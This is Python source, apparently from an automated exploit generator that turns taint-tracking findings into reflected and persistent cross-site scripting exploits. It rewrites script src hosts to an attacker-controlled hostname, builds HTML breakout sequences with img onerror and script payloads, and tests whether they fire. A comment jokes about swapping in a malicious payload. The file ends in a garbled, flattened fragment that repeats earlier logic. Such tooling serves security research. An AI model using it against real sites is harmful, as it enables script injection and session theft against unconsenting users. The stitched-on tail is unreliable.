def get_script_src_exploit(finding):
    """
    Generate exploit candidates which flow into the script src sink.

    For every source of the finding, check whether its tainted part covers the beginning of
    the script URL or (part of) its network location. If so, build a payload pointing at
    SCRIPT_SOURCE_HOSTNAME and turn it into either a reflected exploit candidate or, for
    cookie / storage sources, a persistent (PCXSS) exploit candidate.

    :param finding: the finding to analyze; the keys "sources", "value", "url" and "storage" are read
    :return: list of exploit candidates
    """
    exploits = []
    for source in finding["sources"]:
        original_script_src = finding["value"]
        script_src = original_script_src
        value_part = source["value_part"]
        # an empty or single-character tainted part cannot redirect the script; an empty part
        # would additionally match every startswith() check and make str.replace() insert the
        # payload between all characters of a storage value
        if len(value_part) <= 1:
            continue
        found = False
        payload = None
        # we have found the complete value directly, just substitute it with a hostname under our control
        if script_src.startswith(value_part):
            payload = "https://" + SCRIPT_SOURCE_HOSTNAME + '/'
            found = True
        # check for relative URL
        if not script_src.startswith("http"):
            script_src = urljoin(finding["url"], script_src)
        parsed = urlsplit(script_src)
        if parsed.netloc == value_part:
            payload = SCRIPT_SOURCE_HOSTNAME + '/'
            found = True
        scheme_length = len(parsed.scheme) + len("://")
        end_of_domain = scheme_length + len(parsed.netloc)
        # resolving a relative URL prepends characters, so the recorded offsets have to be shifted
        script_src_diff = len(script_src) - len(original_script_src)
        # our value lies somewhere where we can influence the location
        if -1 < source["start"] + script_src_diff < end_of_domain:
            if source["end"] + script_src_diff < scheme_length:
                # but just in the protocol :(
                continue
            # replace the netlocation with our hostname
            payload = value_part.replace(parsed.netloc, SCRIPT_SOURCE_HOSTNAME)
            # if it is not part of the initial value, just try to insert it anyway
            if parsed.netloc not in value_part:
                payload = "." + SCRIPT_SOURCE_HOSTNAME + '/'
            found = True
        # found = True => payload is defined
        if not found:
            continue
        # if it is a reflected source, build reflected exploit candidate
        if source["source"] not in [SOURCES.SOURCE_COOKIE, SOURCES.SOURCE_LOCAL_STORAGE,
                                    SOURCES.SOURCE_SESSION_STORAGE]:
            exploit_urls = build_reflected_exploit(finding, payload, value_part, source["source"])
            # if it worked, we can add it to our found exploits
            if exploit_urls is not None:
                exploits.append(createWebExploit(exploit_urls, source["id"]))
            continue
        # build a PCXSS exploit candidate
        # fetch the respective storage entries to check for our tainted value
        if source["source"] == SOURCES.SOURCE_COOKIE:
            storage_items = finding["storage"]["cookies"]
        else:
            storage_items = finding["storage"]["storage"]
        if len(storage_items) == 0:
            # we dont have any storage items recorded, so nothing to see
            continue
        matches = find_match(storage_items, value_part)
        # for each match in the storage entries we can generate a candidate
        for match in matches:
            matched_key, matched_value, matched_storage_value, fuzzy, addinfo = match
            # named differently from the URL split result above to avoid shadowing it
            if is_json(matched_storage_value):
                parsed_json = try_parse_json(matched_storage_value)
            else:
                parsed_json = None
            replace_value = matched_storage_value
            if parsed_json and matched_storage_value != value_part:
                # we need to replace the whole thing
                replace_with = json.dumps(recursive_replace(parsed_json, value_part, payload))
            else:
                replace_with = replace_value.replace(value_part, payload)
            if "quoted" in addinfo:
                try:
                    replace_with = quote(replace_with)
                except KeyError:
                    replace_with = manual_quote(replace_with)
            # check whether the substitution was indeed successful
            if 'alert' not in replace_with and SCRIPT_SOURCE_HOSTNAME not in replace_with:
                log("Substitution of script source PCXSS candidate did not work!")
            else:
                exploits.append(
                    createPCXSSExploit(source["source_name"], matched_key, matched_storage_value, source["id"],
                                       replace_value, replace_with))
    return exploits
def get_html_exploit(finding):
    """
    Generate exploits for an HTML executing sink.

    The first 20 sources of the finding are fed, in order, through one shared HTMLStateMachine
    to obtain a breakout sequence for each of them. Reflected sources yield URL based exploit
    candidates (after checking the resulting markup with BeautifulSoup), cookie / storage
    sources yield persistent (PCXSS) candidates. Any exception raised while processing is
    logged and the candidates collected up to that point are returned.

    :param finding: the finding to investigate
    :return: list of exploit candidates
    """
    exploits = list()
    # our payload is a piece of Javascript, thus we need to prepare it into an HTML payload first
    validation_payload = CONFIG.payload
    payload = "<img src=foo onerror=%s onload=%s>" % (validation_payload, validation_payload)
    # textareas are the easiest way to breakin into HTML
    # since they catch anything up to the closing tag of the current environment
    breakin = "<textarea>"
    # in instances where we can write script tags we can also simply resort to this simpler case
    if finding["sink_id"] in [SINKS.SINK_DOC_WRITE, SINKS.SINK_IFRAME_SRCDOC]:
        payload = "<script>%s</script>" % validation_payload
    try:
        # start generating the appropriate breakouts
        parser = HTMLStateMachine()
        prior_parsed = 0
        # there are findings in which we have plenty sources which are just generating duplicate exploits
        # will only be vulnerable if a predecessor is also vulnerable, thus restrict to the 20 first
        for source in finding["sources"][:20]:
            # the complete value ending up in the sink
            value = finding["value"]
            # the specific part of the value originating from this source
            value_part = source["value_part"]
            # skip unreasonable values/sources which are not considered in our exploitation
            if source["value_part"] == "?":
                continue
            if source["source"] not in GENERATE_EXPLOIT_FOR_SOURCES:
                log("Skipping source with source_id {}!".format(source["source"]))
                continue
            if source["hasEscaping"] + source["hasEncodingURI"] + source["hasEncodingURIComponent"] > 0:
                log("Skipping source with encoding!")
                continue
            # offsets in the overall value
            taint_start, taint_end = source["start"], source["end"]
            # if this is not the case we have encoding problems in which case some bytes might be missing
            # thus we need to recalc the offset
            if value_part != value[taint_start:taint_end]:
                if value.count(value_part) == 1:
                    taint_start = value.find(value_part)
                    taint_end = taint_start + len(value_part)
                    log('Mismatch in taint start info %s %s' % (taint_start, len(value)))
                else:
                    # the part occurs several times or not at all, so its position is ambiguous
                    continue
            # get the string part which resides between the current source and the prior parsed part of the string
            # then feed it into our state machine and use the resulting state as basis to generate the breakout
            string_to_parse = finding["value"][prior_parsed:taint_start] + source["value_part"]
            prior_parsed = taint_end
            log("Getting HTML breakout for %s (%s): %s" % (source["id"], string_to_parse, value_part))
            # feeds the string to the parser and then outputs the breakout sequence
            breakout_sequence = getHTMLBreakout(parser, string_to_parse)
            log("Result: %s" % breakout_sequence)
            # TODO (ben) fix this bridge, not only rcxss but also pcxss and if we have only seen / we can do stuff
            # check if we are currently in the process of writing the src property of a script tag which we can hijack
            if len(parser.opened_tags) > 0:
                top_element = parser.opened_tags[0]
                if top_element.get("name", "").lower() == 'script' and len(top_element.get("attributes", [])):
                    if (top_element.get("attributes")[0]).get("name", "") == 'src':
                        url_so_far = urljoin(finding["url"], top_element["attributes"][0]["value"])
                        if url_so_far.count("/") < 3:
                            # we control the origin, woohoo
                            parsed = urlsplit(url_so_far)
                            if parsed.netloc in source["value_part"] or source["value_part"] in parsed.netloc:
                                # NOTE(review): this rebinds the HTML payload defined before the loop, so
                                # later sources see the hostname payload as well - confirm this is intended
                                payload = source["value_part"].replace(parsed.netloc, SCRIPT_SOURCE_HOSTNAME)
                                breakout_sequence = ""
                                exploit_url = build_reflected_exploit(finding, payload, source["value_part"],
                                                                      source["source"])
                                if exploit_url:
                                    exploits.append(createWebExploit(exploit_url, source["id"]))
                                    continue
            # We have generated a breakout sequence and can make use of it now
            if breakout_sequence is not None:
                if source["source"] not in [SOURCES.SOURCE_COOKIE, SOURCES.SOURCE_LOCAL_STORAGE,
                                            SOURCES.SOURCE_SESSION_STORAGE]:
                    # RCXSS
                    # assemble the complete exploit candidate
                    resulting_markup = value[:taint_start] + source[
                        "value_part"] + breakout_sequence + payload + breakin + value[taint_end:]
                    assert resulting_markup != value
                    working_exploit = False
                    # check for exploitability
                    try:
                        soup = BeautifulSoup(resulting_markup, "html5lib")
                        for script in soup.find_all("script"):
                            # either we are injected into a script
                            if script.text:
                                if script.text == validation_payload:
                                    working_exploit = True
                            # or part of a script src
                            if "src" in script.attrs:
                                parsed = urlsplit(script["src"])
                                if parsed.netloc.endswith(SCRIPT_SOURCE_HOSTNAME):
                                    working_exploit = True
                        # or into the onload/onerror of an image
                        for img in soup.find_all("img"):
                            if "onload" in img.attrs and img["onload"].strip() == validation_payload:
                                working_exploit = True
                    except Exception as e:
                        # "as" form instead of the Python-2-only "except Exception, e";
                        # a parsing failure simply leaves working_exploit at False
                        log('Error in parsing resulting payload of an HTML exploit {}'.format(e))
                    # We were not able to find our payload thus also we do not need to validate
                    if not working_exploit:
                        log("After substitution of HTML exploit, payload was non functional!")
                        continue
                    # we are building exploits for reflected source thus build the respective urls
                    exploit_url = build_reflected_exploit(finding,
                                                          source["value_part"] + breakout_sequence + payload + breakin,
                                                          source["value_part"], source["source"])
                    if exploit_url is None:
                        log('Unable to generate exploit URL for HTML RCXSS!')
                        continue
                    else:
                        exploits.append(createWebExploit(exploit_url, source["id"]))
                else:
                    # PCXSS
                    # select the appropriate storage
                    if source["source"] == SOURCES.SOURCE_COOKIE:
                        storage_items = finding["storage"]["cookies"]
                    else:
                        storage_items = finding["storage"]["storage"]
                    if len(storage_items) == 0:
                        matches = None
                    else:
                        matches = find_match(storage_items, value_part)
                    if matches is None and source["source"] == SOURCES.SOURCE_COOKIE and ";" in value_part:
                        # document.cookie directly into sink
                        exploits.append(
                            createPCXSSExploit(source["source_name"], "___foobar___", None, source["id"], None,
                                               payload + breakin))
                    elif matches is None:
                        log('Could not find the respective storage entry for an HTML PCXSS exploit!')
                    else:
                        # we actually have matches
                        for match in matches:
                            matched_key, matched_value, matched_storage_value, fuzzy, addinfo = match
                            # TODO merge with above
                            if matched_key in ("_parsely_visitor", "_parsely_session"):
                                continue
                            if is_json(matched_storage_value):
                                parsed = try_parse_json(matched_storage_value)
                            else:
                                parsed = None
                            # storage value is a dict
                            if parsed:
                                replace_value = matched_storage_value
                                replace_with = recursive_replace(parsed, source["value_part"],
                                                                 source["value_part"] + breakout_sequence
                                                                 + payload + breakin)
                                replace_with = json.dumps(replace_with)
                            # the storage value is not a dictionary
                            else:
                                replace_value = matched_storage_value
                                replace_with = replace_value.replace(source["value_part"],
                                                                     source["value_part"] + breakout_sequence
                                                                     + payload + breakin)
                            if "quoted" in addinfo:
                                try:
                                    replace_with = quote(replace_with)
                                except KeyError:
                                    replace_with = manual_quote(replace_with)
                            # the substitution changed nothing, so there is no candidate to record
                            if replace_with == replace_value:
                                continue
                            # FIXME what could possibly go wrong here if you change the payload to something malicious ;)
                            if "alert" not in replace_with and "persistent" not in replace_with:
                                log('Failed to find HTML exploit after substitution for PCXSS JS exploit!')
                                continue
                            exploits.append(
                                createPCXSSExploit(source["source_name"], matched_key, matched_storage_value,
                                                   source["id"], replace_value, replace_with))
    except Exception as e:
        log("ERR {} {}".format(e, finding["finding_id"]))
    return exploits
replace_with = CONFIG.payload if "quoted" in addinfo: replace_with = quote(replace_with) replace_value = matched_storage_value exploits.append( createPCXSSExploit(source["source_name"], matched_key, matched_storage_value, source["id"], replace_value, replace_with)) continue # only storage value is a dict, thus we need to replace the value recursively into the dict if isinstance(parsed, dict): replace_value = matched_storage_value replace_with = recursive_replace(parsed, source["value_part"], source["value_part"] + payload) replace_with = json.dumps(replace_with) # the storage value is not a dictionary, thus resort to normal string replace else: replace_value = matched_storage_value replace_with = replace_value.replace(source["value_part"], source["value_part"] + payload) if "quoted" in addinfo: replace_with = quote(replace_with) if replace_with == replace_value: continue # FIXME what could possibly go wrong here if you change the payload to something malicious ;) if "alert" not in replace_with and "persistent" not in replace_with: log('Failed to find js exploit after substitution for PCXSS JS exploit!')